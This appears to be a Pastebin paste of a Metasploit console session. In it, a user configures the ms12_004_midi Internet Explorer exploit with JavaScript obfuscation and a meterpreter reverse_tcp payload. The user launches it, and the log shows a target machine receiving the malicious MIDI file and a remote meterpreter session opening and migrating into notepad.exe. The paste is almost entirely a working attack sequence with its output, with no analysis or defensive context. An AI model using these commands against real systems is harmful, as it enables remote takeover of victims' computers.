Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf > use windows/browser/ms12_004_midi
- msf exploit(ms12_004_midi) > set obfuscate true
- obfuscate => true
- msf exploit(ms12_004_midi) > set payload windows/meterpreter/reverse_tcp
- payload => windows/meterpreter/reverse_tcp
- msf exploit(ms12_004_midi) > set lhost 10.0.1.3
- lhost => 10.0.1.3
- msf exploit(ms12_004_midi) > show options
- Module options (exploit/windows/browser/ms12_004_midi):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- OBFUSCATE true no Enable JavaScript obfuscation
- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
- SRVPORT 8080 yes The local port to listen on.
- SSL false no Negotiate SSL for incoming connections
- SSLCert no Path to a custom SSL certificate (default is randomly generated)
- SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
- URIPATH no The URI to use for this exploit (default is random)
- Payload options (windows/meterpreter/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC process yes Exit technique: seh, thread, process, none
- LHOST 10.0.1.3 yes The listen address
- LPORT 4444 yes The listen port
- Exploit target:
- Id Name
- -- ----
- 0 Automatic
- msf exploit(ms12_004_midi) > exploit
- [*] Exploit running as background job.
- [*] Started reverse handler on 10.0.1.3:4444
- [*] Using URL: http://0.0.0.0:8080/ZTee20TR5fR
- msf exploit(ms12_004_midi) > [*] Local IP: http://10.0.1.3:8080/ZTee20TR5fR
- [*] Server started.
- [*] Sending html to 10.0.1.4:2319...
- [*] Sending midi file to 10.0.1.4:2320...
- [*] Sending stage (752128 bytes) to 10.0.1.4
- [*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.4:2325) at 2012-01-27 03:41:53 -0600
- [*] Session ID 1 (10.0.1.3:4444 -> 10.0.1.4:2325) processing InitialAutoRunScript 'migrate -f'
- [*] Current server process: iexplore.exe (3456)
- [*] Spawning notepad.exe process to migrate to
- [+] Migrating to 2744
- [+] Successfully migrated to process
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement